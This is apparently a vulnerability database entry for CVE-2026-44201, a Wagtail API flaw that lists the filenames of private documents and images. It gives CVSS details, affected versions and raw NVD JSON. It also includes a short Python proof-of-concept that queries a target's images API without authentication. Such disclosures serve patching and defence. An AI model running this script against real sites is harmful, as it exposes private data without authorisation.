Security Vulnerability Report
CVE-2026-44201 CVSS 5.3 MEDIUM

Published: 2026-05-11 16:17:36
Last Modified: 2026-05-12 15:59:06

Description

Wagtail is an open source content management system built on Django. Prior to 7.0.7, 7.3.2, and 7.4, the Documents and Images API incorrectly listed items in private collections. A user with access to the API could see the filename and name of documents and images in private collections. This vulnerability is fixed in 7.0.7, 7.3.2, and 7.4.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:torchbox:wagtail:*:*:*:*:*:*:*:* (versions before 7.0.7) - VULNERABLE
cpe:2.3:a:torchbox:wagtail:*:*:*:*:*:*:*:* (versions from 7.1, before 7.3.2) - VULNERABLE
Wagtail < 7.0.7
Wagtail < 7.3.2
Wagtail < 7.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL vulnerable to CVE-2026-44201
# Replace with actual target domain
target_url = "http://target-site.com/api/v2/images/"

try:
    # Send a GET request to the API
    # No authentication is required based on the vulnerability description
    response = requests.get(target_url, timeout=10)
    if response.status_code == 200:
        data = response.json()
        print("Successfully retrieved data:")
        # Check if items from private collections are exposed
        for item in data.get('items', []):
            print(f"Title: {item.get('title')}, Filename: {item.get('filename')}")
    else:
        print(f"Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"An error occurred: {e}")
```

References

https://github.com/wagtail/wagtail/security/advisories/GHSA-p5gm-92h4-6pv6 (Vendor Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-44201", "sourceIdentifier": "[email protected]", "published": "2026-05-11T16:17:35.850", "lastModified": "2026-05-12T15:59:06.407", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wagtail is an open source content management system built on Django. Prior to 7.0.7, 7.3.2, and 7.4, the Documents and Images API incorrectly listed items in private collections. A user with access to the API could see the filename and name of documents and images in private collections. This vulnerability is fixed in 7.0.7, 7.3.2, and 7.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-280"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:torchbox:wagtail:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.0.7", "matchCriteriaId": "AA54A323-7F77-4D1D-9830-BF8FBE4B5B34"}, {"vulnerable": true, "criteria": "cpe:2.3:a:torchbox:wagtail:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.1", "versionEndExcluding": "7.3.2", "matchCriteriaId": "FED1A6D7-1193-485D-B25F-60FCC20A6D6B"}]}]}], "references": [{"url": "https://github.com/wagtail/wagtail/security/advisories/GHSA-p5gm-92h4-6pv6", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
```